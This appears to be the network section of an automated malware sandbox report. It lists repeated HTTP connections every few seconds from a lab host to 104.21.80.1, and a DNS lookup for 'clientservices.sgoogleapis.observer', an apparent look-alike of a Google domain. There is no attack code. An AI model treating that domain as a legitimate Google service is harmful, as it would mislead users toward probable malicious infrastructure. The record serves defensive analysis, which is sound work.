              Jan 8, 2025 08:46:46.118366957 CET5005080192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:46.118952036 CET5005180192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:46.123514891 CET8050050104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:46.123619080 CET5005080192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:46.123831987 CET8050051104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:46.123946905 CET5005180192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:46.124140024 CET5005180192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:46.128916025 CET8050051104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:46.756897926 CET8050051104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:46.756961107 CET5005180192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:48.275198936 CET5005180192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:48.275533915 CET5005280192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:48.280386925 CET8050052104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:48.280478001 CET5005280192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:48.280689955 CET5005280192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:48.280889988 CET8050051104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:48.281014919 CET5005180192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:48.285437107 CET8050052104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:48.954159021 CET8050052104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:48.954267979 CET5005280192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:50.587490082 CET5005280192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:50.588007927 CET5005380192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:50.592602968 CET8050052104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:50.592659950 CET5005280192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:50.592834949 CET8050053104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:50.592901945 CET5005380192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:50.593051910 CET5005380192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:50.597771883 CET8050053104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:51.148322105 CET8050053104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:51.148475885 CET5005380192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:52.686657906 CET5005380192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:52.687191963 CET5005480192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:52.691782951 CET8050053104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:52.691837072 CET5005380192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:52.692013025 CET8050054104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:52.692070961 CET5005480192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:52.692282915 CET5005480192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:52.697144985 CET8050054104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:53.322114944 CET8050054104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:53.322220087 CET5005480192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:55.008467913 CET5005480192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:55.008871078 CET5005580192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:55.013637066 CET8050054104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:55.013655901 CET8050055104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:55.013695955 CET5005480192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:55.013747931 CET5005580192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:55.013951063 CET5005580192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:55.018693924 CET8050055104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:55.671662092 CET8050055104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:55.671736002 CET5005580192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:57.180927038 CET5005580192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:57.181298018 CET5005680192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:57.186156988 CET8050056104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:57.186172009 CET8050055104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:57.186232090 CET5005580192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:57.186243057 CET5005680192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:57.186420918 CET5005680192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:57.191147089 CET8050056104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:57.840380907 CET8050056104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:57.840459108 CET5005680192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:59.461317062 CET5005680192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:59.464519978 CET5005780192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:59.466454983 CET8050056104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:59.467012882 CET5005680192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:59.469427109 CET8050057104.21.80.1192.168.2.5
              Jan 8, 2025 08:46:59.472703934 CET5005780192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:59.476527929 CET5005780192.168.2.5104.21.80.1
              Jan 8, 2025 08:46:59.481323004 CET8050057104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:00.166419029 CET8050057104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:00.168601036 CET5005780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:01.680525064 CET5005780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:01.680526018 CET5005880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:01.685473919 CET8050058104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:01.685739040 CET8050057104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:01.685841084 CET5005880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:01.685842991 CET5005780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:01.686073065 CET5005880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:01.690874100 CET8050058104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:02.336062908 CET8050058104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:02.336147070 CET5005880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:03.961539030 CET5005880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:03.961894035 CET5005980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:03.966797113 CET8050059104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:03.966837883 CET8050058104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:03.966916084 CET5005980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:03.966978073 CET5005880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:03.967138052 CET5005980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:03.971877098 CET8050059104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:04.610625029 CET8050059104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:04.610691071 CET5005980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:06.133744955 CET5005980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:06.133748055 CET5006080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:06.138559103 CET8050060104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:06.138660908 CET5006080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:06.138837099 CET5006080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:06.138926029 CET8050059104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:06.139056921 CET5005980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:06.143600941 CET8050060104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:06.771224022 CET8050060104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:06.771295071 CET5006080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:08.424429893 CET5006080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:08.424866915 CET5006180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:08.429469109 CET8050060104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:08.429524899 CET5006080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:08.429734945 CET8050061104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:08.429800034 CET5006180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:08.430006981 CET5006180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:08.434768915 CET8050061104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:09.056909084 CET8050061104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:09.056998014 CET5006180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:10.582659006 CET5006180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:10.583184004 CET5006280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:10.587752104 CET8050061104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:10.587811947 CET5006180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:10.588032961 CET8050062104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:10.588102102 CET5006280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:10.588701963 CET5006280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:10.593553066 CET8050062104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:11.229614973 CET8050062104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:11.229677916 CET5006280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:12.852164984 CET5006280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:12.852571964 CET5006380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:12.857372999 CET8050063104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:12.857398987 CET8050062104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:12.857454062 CET5006380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:12.857482910 CET5006280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:12.857634068 CET5006380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:12.862418890 CET8050063104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:13.491180897 CET8050063104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:13.491323948 CET5006380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:15.009068966 CET5006480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:15.009072065 CET5006380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:15.014832973 CET8050064104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:15.014919996 CET5006480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:15.014988899 CET8050063104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:15.015047073 CET5006480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:15.015048027 CET5006380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:15.019862890 CET8050064104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:15.677457094 CET8050064104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:15.677545071 CET5006480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:17.305901051 CET5006480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:17.306277037 CET5006580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:17.311198950 CET8050065104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:17.311214924 CET8050064104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:17.311304092 CET5006580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:17.311336040 CET5006480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:17.311474085 CET5006580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:17.316418886 CET8050065104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:17.966834068 CET8050065104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:17.968671083 CET5006580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:19.477406025 CET5006680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:19.477406979 CET5006580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:19.482235909 CET8050066104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:19.482419968 CET8050065104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:19.482788086 CET5006580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:19.482789040 CET5006680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:19.486701965 CET5006680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:19.491555929 CET8050066104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:20.142399073 CET8050066104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:20.143399000 CET5006680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:21.774137020 CET5006780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:21.774139881 CET5006680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:21.779011011 CET8050067104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:21.779141903 CET5006780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:21.779148102 CET8050066104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:21.779207945 CET5006780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:21.779280901 CET5006680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:21.788938046 CET8050067104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:22.416116953 CET8050067104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:22.416181087 CET5006780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:23.930286884 CET5006780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:23.930788040 CET5006880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:23.935260057 CET8050067104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:23.935379028 CET5006780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:23.935607910 CET8050068104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:23.938659906 CET5006880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:23.938900948 CET5006880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:23.943705082 CET8050068104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:24.585119009 CET8050068104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:24.585179090 CET5006880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:26.230142117 CET5006880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:26.230577946 CET5006980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:26.235177994 CET8050068104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:26.235362053 CET5006880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:26.235405922 CET8050069104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:26.235506058 CET5006980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:26.236154079 CET5006980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:26.241035938 CET8050069104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:26.799917936 CET8050069104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:26.799988031 CET5006980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:28.305900097 CET5007080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:28.305902004 CET5006980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:28.310770035 CET8050070104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:28.310946941 CET8050069104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:28.311043978 CET5006980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:28.311111927 CET5007080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:28.312567949 CET5007080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:28.317383051 CET8050070104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:28.946984053 CET8050070104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:28.947051048 CET5007080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:30.728621960 CET5007080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:30.728909016 CET5007180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:30.733638048 CET8050070104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:30.733688116 CET8050071104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:30.733699083 CET5007080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:30.733741999 CET5007180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:30.733923912 CET5007180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:30.738714933 CET8050071104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:31.371124029 CET8050071104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:31.371197939 CET5007180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:32.884388924 CET5007180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:32.884823084 CET5007280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:32.889426947 CET8050071104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:32.889547110 CET5007180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:32.889678001 CET8050072104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:32.889746904 CET5007280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:32.889921904 CET5007280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:32.894653082 CET8050072104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:33.532941103 CET8050072104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:33.540648937 CET5007280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:33.664865971 CET8050072104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:33.664985895 CET5007280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:35.290335894 CET5007280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:35.290679932 CET5007380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:35.295320988 CET8050072104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:35.295382023 CET5007280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:35.295434952 CET8050073104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:35.295511007 CET5007380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:35.295711040 CET5007380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:35.300486088 CET8050073104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:35.924393892 CET8050073104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:35.924508095 CET5007380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:37.430627108 CET5007380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:37.430629969 CET5007480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:37.435538054 CET8050074104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:37.435750008 CET8050073104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:37.435868025 CET5007380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:37.435873032 CET5007480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:37.436069012 CET5007480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:37.440871954 CET8050074104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:38.069399118 CET8050074104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:38.069521904 CET5007480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:38.199882030 CET8050074104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:38.201426983 CET5007480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:39.820940018 CET5007480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:39.821225882 CET5007580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:39.826040983 CET8050075104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:39.826245070 CET8050074104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:39.826335907 CET5007580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:39.826354980 CET5007480192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:39.826623917 CET5007580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:39.832873106 CET8050075104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:40.452537060 CET8050075104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:40.452586889 CET5007580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:41.961908102 CET5007580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:41.962157011 CET5007680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:41.966933012 CET8050076104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:41.967035055 CET5007680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:41.967061043 CET8050075104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:41.967153072 CET5007580192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:41.967251062 CET5007680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:41.971988916 CET8050076104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:42.608059883 CET8050076104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:42.608124018 CET5007680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:44.286190033 CET5007780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:44.286225080 CET5007680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:44.291093111 CET8050077104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:44.291363955 CET8050076104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:44.291461945 CET5007680192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:44.291479111 CET5007780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:44.295206070 CET5007780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:44.300076962 CET8050077104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:44.854605913 CET8050077104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:44.854656935 CET5007780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:46.368124008 CET5007780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:46.368135929 CET5007880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:46.372924089 CET8050078104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:46.373086929 CET8050077104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:46.376669884 CET5007780192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:46.376693964 CET5007880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:46.376808882 CET5007880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:46.381582975 CET8050078104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:47.007442951 CET8050078104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:47.007518053 CET5007880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:48.743391991 CET5007880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:48.743695974 CET5007980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:48.748493910 CET8050078104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:48.748508930 CET8050079104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:48.748548985 CET5007880192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:48.748584986 CET5007980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:48.748728991 CET5007980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:48.753490925 CET8050079104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:49.371973038 CET8050079104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:49.372061014 CET5007980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:50.885447979 CET5007980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:50.885792017 CET5008080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:50.890353918 CET8050079104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:50.890409946 CET5007980192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:50.890598059 CET8050080104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:50.890664101 CET5008080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:50.890877008 CET5008080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:50.895654917 CET8050080104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:51.539683104 CET8050080104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:51.542665005 CET5008080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:53.243536949 CET5008080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:53.244097948 CET5008180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:53.248490095 CET8050080104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:53.248536110 CET5008080192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:53.248948097 CET8050081104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:53.249176979 CET5008180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:53.249902964 CET5008180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:53.254657984 CET8050081104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:53.871049881 CET8050081104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:53.873732090 CET5008180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:55.385744095 CET5008180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:55.386121035 CET5008280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:55.390769005 CET8050081104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:55.390846014 CET5008180192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:55.390933037 CET8050082104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:55.391000986 CET5008280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:55.391611099 CET5008280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:55.396397114 CET8050082104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:56.047641039 CET8050082104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:56.047729969 CET5008280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:57.680730104 CET5008380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:57.680733919 CET5008280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:57.685487986 CET8050083104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:57.685568094 CET5008380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:57.685745955 CET8050082104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:57.685775042 CET5008380192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:57.685884953 CET5008280192.168.2.5104.21.80.1
              Jan 8, 2025 08:47:57.690521002 CET8050083104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:58.309581041 CET8050083104.21.80.1192.168.2.5
              Jan 8, 2025 08:47:58.314738989 CET5008380192.168.2.5104.21.80.1
              Jan 8, 2025 08:48:00.914637089 CET5008380192.168.2.5104.21.80.1
              Jan 8, 2025 08:48:00.915019035 CET5008480192.168.2.5104.21.80.1
              Jan 8, 2025 08:48:00.919595957 CET8050083104.21.80.1192.168.2.5
              Jan 8, 2025 08:48:00.919675112 CET5008380192.168.2.5104.21.80.1
              Jan 8, 2025 08:48:00.919856071 CET8050084104.21.80.1192.168.2.5
              Jan 8, 2025 08:48:00.919967890 CET5008480192.168.2.5104.21.80.1
              Jan 8, 2025 08:48:00.920124054 CET5008480192.168.2.5104.21.80.1
              Jan 8, 2025 08:48:00.924881935 CET8050084104.21.80.1192.168.2.5
              Jan 8, 2025 08:48:01.581615925 CET8050084104.21.80.1192.168.2.5
              Jan 8, 2025 08:48:01.581677914 CET5008480192.168.2.5104.21.80.1
              TimestampSource PortDest PortSource IPDest IP
              Jan 8, 2025 08:43:56.042383909 CET5056153192.168.2.51.1.1.1
              Jan 8, 2025 08:43:56.056834936 CET53505611.1.1.1192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jan 8, 2025 08:43:56.042383909 CET192.168.2.51.1.1.10xf0a1Standard query (0)clientservices.sgoogleapis.observerA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jan 8, 2025 08:43:56.056834936 CET1.1.1.1192.168.2.50xf0a1No error (0)clientservices.sgoogleapis.observer104.21.80.1A (IP address)IN (0x0001)false
              Jan 8, 2025 08:43:56.056834936 CET1.1.1.1192.168.2.50xf0a1No error (0)clientservices.sgoogleapis.observer104.21.64.1A (IP address)IN (0x0001)false
              Jan 8, 2025 08:43:56.056834936 CET1.1.1.1192.168.2.50xf0a1No error (0)clientservices.sgoogleapis.observer104.21.16.1A (IP address)IN (0x0001)false
              Jan 8, 2025 08:43:56.056834936 CET1.1.1.1192.168.2.50xf0a1No error (0)clientservices.sgoogleapis.observer104.21.96.1A (IP address)IN (0x0001)false
              Jan 8, 2025 08:43:56.056834936 CET1.1.1.1192.168.2.50xf0a1No error (0)clientservices.sgoogleapis.observer104.21.32.1A (IP address)IN (0x0001)false
              Jan 8, 2025 08:43:56.056834936 CET1.1.1.1192.168.2.50xf0a1No error (0)clientservices.sgoogleapis.observer104.21.112.1A (IP address)IN (0x0001)false
              Jan 8, 2025 08:43:56.056834936 CET1.1.1.1192.168.2.50xf0a1No error (0)clientservices.sgoogleapis.observer104.21.48.1A (IP address)IN (0x0001)false
              • clientservices.sgoogleapis.observer
